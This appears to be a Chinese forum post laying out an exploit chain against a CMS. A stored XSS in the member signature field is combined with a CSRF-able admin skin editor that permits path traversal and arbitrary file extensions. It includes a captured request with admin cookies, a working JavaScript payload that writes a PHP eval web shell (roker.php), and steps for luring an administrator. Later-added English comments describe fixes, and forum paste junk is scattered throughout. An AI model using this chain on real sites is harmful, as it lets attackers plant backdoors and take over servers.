这个 CMS 以前 90 有人发过一个 getshell，当时是后台验证文件的问题。
官网已经修补了，所以重新下载了源码。
因为后台登录还需要认证码，所以注入就没看了。
存在 XSS。
漏洞文件：user/member/skin_edit.php
! h8 g$ E" E; K5 s) ^. C本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:# U$ }: l6 c; h/ h9 l
, @0 {& v$ m8 x8 a! c$ t9 \2 Y
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>, Q& i" e+ R" A( x0 c
; A7 P5 I6 ?8 k* u+ f9 X</textarea></td></tr>
4 D" `0 X& K) m8 ?0 ~5 i 1 R) g1 p8 x0 P6 e1 k M8 X
user/do.php
3 g f! F# q6 m. o+ z+ Q
// Profile-update branch of user/do.php (op=zl, 资料 = profile data).
// Sink for the stored XSS described in this post: the signature field
// CS_Qianm is written to the database as-is and skin_edit.php later echoes
// $cscms_qianm straight into a <textarea> with no HTML encoding.
// Fix on the output side: HTML-encode the signature (and the other profile
// fields) wherever they are rendered.
9 N( }' t! n1 X3 R! H! Gif($op=='zl'){ // profile data (资料)
4 J5 U2 p+ p, |: n7 P, R$ E0 |
// Only presence is checked here; none of the fields are validated or
// encoded before use.
! \' ?3 m9 t" u! G9 C if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))
7 j2 ~" H$ x5 [9 X( z, q& N exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));
^8 J& O4 N' y: m
// The UPDATE is assembled by string concatenation from request-controlled
// values (CS_Nichen, CS_Email, CS_Sex, CS_City, CS_QQ, CS_Qianm). Whether an
// earlier filter escapes them is not visible here; if not, this is also an
// SQL-injection risk — a prepared/parameterized query would close it.
// NOTE: the three lines below carry forum paste artifacts inside the literal.
2 V8 g- x4 g. } Z' Y* E $sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',6 f4 G9 ^# H4 X& M
) D& |% A" N' ?; | CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'1 L6 O$ L- u; D T- R7 }
where CS_Name='".$cscms_name."'";
) A2 a5 I- Z' \! ^* w% g+ V! J
// The raw string is handed directly to the DB layer.
! z: q w5 t8 Z8 D if($db->query($sql)){
' _1 \1 U- ~8 r, x
2 X! b, j2 ]3 ?- d: Z exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));
: K6 ~: i3 ]" E7 e+ Q1 m* v 6 F' A+ l# c: \6 G0 L- o9 a. q
}else{
2 J" A% N, x+ J5 a0 U 2 y2 O, W& C# C8 Y! M1 E
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));
( i& y7 e4 h6 Q1 j
$ Z. ^' I! G9 m& H }
) m: H& f! r$ D+ I4 `. q+ v, _) n: {6 k
没有过滤，导致 XSS 产生。
后台看了下，很奇葩的是可以写任意格式的文件。
抓包：
* g1 m# m% Y$ {3 d
# E4 I& U$ K+ s本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1
* f. N2 ~1 G$ O! [ ( o, [* Q* J% R% A
Accept: text/html, application/xhtml+xml, */*( o5 m! j( }7 z9 e- x" l
6 U/ v1 P( t0 d5 gReferer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php# x+ P" _6 u* M# r
9 j% E' `+ i# F5 t( e) |1 ]
Accept-Language: zh-CN. \8 L, L) G5 D* x8 k7 t3 r) ^
( y, X+ D) g* U) U7 N& n# ]
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
7 M- ?1 K0 ~) ^) B P
6 F* g0 P2 L! _( h; K+ @Content-Type: application/x-www-form-urlencoded+ Y7 {* o. Z( c( x8 ^; Q
7 {* E5 p3 w0 p
Accept-Encoding: gzip, deflate, v5 ~( l4 k4 l' p4 }9 E `3 F, B
9 h& t6 P9 A- L3 M& y
Host: 127.0.0.1
, n: l( l0 E6 X9 @3 |( C 5 _' P- t3 p4 [/ x7 u
Content-Length: 38
4 X8 B# {& V& b. F$ l1 E
7 N- r4 E r4 a4 @/ d7 mDNT: 1
% w+ s: W9 Y# t8 i0 L% |8 T 2 G# P0 J7 g4 O {1 J) @
Connection: Keep-Alive
( U! @; [( r" U ; j M3 W8 n* i5 S( E+ F
Cache-Control: no-cache
5 j, i b& g1 a) C 9 b& c# \3 S i$ |
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
( t$ x& V* d- F+ F# T7 m' L
$ o7 W5 R# k' r0 u. H# E0 q3 y9 N7 C" L8 a7 \ B* x
name=aaa.php&content=%3Cs%3E%3Ca%25%3E: l' ]' R9 z3 i) p
1 O' M# `. d- L2 R( O- T' N
5 E6 z0 H1 q- F& m: c4 X: V( ]. \: i- b
于是构造 JS 如下。
9 O1 R% p9 A8 r, X6 i
9 ]2 D" X& t7 L2 W本帖隐藏的内容<script> % n% y8 a8 \9 m r
// Proof of concept from this post: the unencoded signature rendered by
// skin_edit.php carries this script; when an administrator's browser renders
// it, the browser POSTs to the admin skin editor
// (admin/skins/skins.php?ac=xgmb&op=go) with the admin's own session cookies
// attached (the CS_Admin* cookies in the capture above).
// What the CMS needs to block this chain: HTML-encode the signature on
// output, require an anti-CSRF token (and SameSite cookies) on the skin
// editor, reject ".." in the `path` parameter, and allow-list the file
// extension of `name` instead of accepting any format.
thisTHost = top.location.hostname;3 x, r/ J4 i" k
: {0 H! }3 }# l8 w3 C) B" ^& [9 `
// Target built from the page's own hostname; `path` traverses out of the
// editor's directory with "../../" (see the captured request).
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' `! q- u. T2 q
// Builds a hidden form carrying the two fields the editor reads (`name`,
// `content`) and auto-submits it. Nothing in the form is a secret the
// attacker would need — which is exactly what a per-session CSRF token
// would add.
6 s E% k4 A' z# w% C6 jfunction PostSubmit(url, data, msg) { ; Z/ U, K' o; N$ r! V* e3 X
var postUrl = url;
0 c& t1 O' o; K# y3 n* p/ n
$ b ?* S( t0 k3 ^ var postData = data;
) s$ \: L1 Y+ S" ?5 m/ O5 W var msgData = msg; % l! W( _* N$ l6 F: H4 n5 z
var ExportForm = document.createElement("FORM");
7 ]- ]" T" V. e8 u: G document.body.appendChild(ExportForm);
* A( G3 E9 F7 l. f ExportForm.method = "POST"; * U/ u2 U- v* y l( r
var newElement = document.createElement("input"); ) \' H5 ?/ |% F$ P. R% C
newElement.setAttribute("name", "name"); . [4 n" P$ b9 x0 | F T1 v9 [6 ]9 U
newElement.setAttribute("type", "hidden");
, B! n/ n6 f# t var newElement2 = document.createElement("input");
2 `+ B2 U$ e( |# T8 a newElement2.setAttribute("name", "content"); % g; I; T t$ @5 o1 J$ M( a+ w
newElement2.setAttribute("type", "hidden");
& P2 c1 a8 O5 G+ ~8 Z! i ExportForm.appendChild(newElement);
# j+ \% w, n! K4 J ExportForm.appendChild(newElement2); 5 [6 k( l) O" p, O9 |
newElement.value = postData;
; ?8 c2 t$ j7 Y9 n$ y6 F6 D* F( L newElement2.value = msgData;
) `. ]. n& ^' w. L9 m7 h7 _3 Z ExportForm.action = postUrl;
, P0 E7 x' v# G" J6 C( h9 a) \ ExportForm.submit(); W) b1 r& N' j- ?2 B
};
$ L# A; w4 k ?; f5 H' k$ N ' x g" ~& N z4 Y' f
// The editor writes `content` to the file named by `name` under the
// traversed path. The post notes the backend accepts any extension; that
// missing extension check is the second bug in the chain and the one that
// turns a template editor into arbitrary file write.
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");* n2 G5 {* Q7 w- s0 @$ \
( z( Q& B: }, ~: i2 K2 j( B) Y</script>
9 f1 b" R$ @3 n! ~9 ~% a9 M
, k* }# r3 M0 X/ t. M; ^6 x+ T# u; |2 _9 R9 ^0 T8 G
3 R/ y3 J5 g7 L j
在 http://127.0.0.1/user/space.php?ac=edit&op=zl 的修改签名处插入。
用你的账号给管理员写个私信，或者让他访问你的主页 http://127.0.0.1/home/?uid=2（uid 自己改）。
就会在 skins\index\html\ 目录下生成 roker.php（一句话）。
. O& [% E1 b$ ?. Y2 O, C! r( d8 l |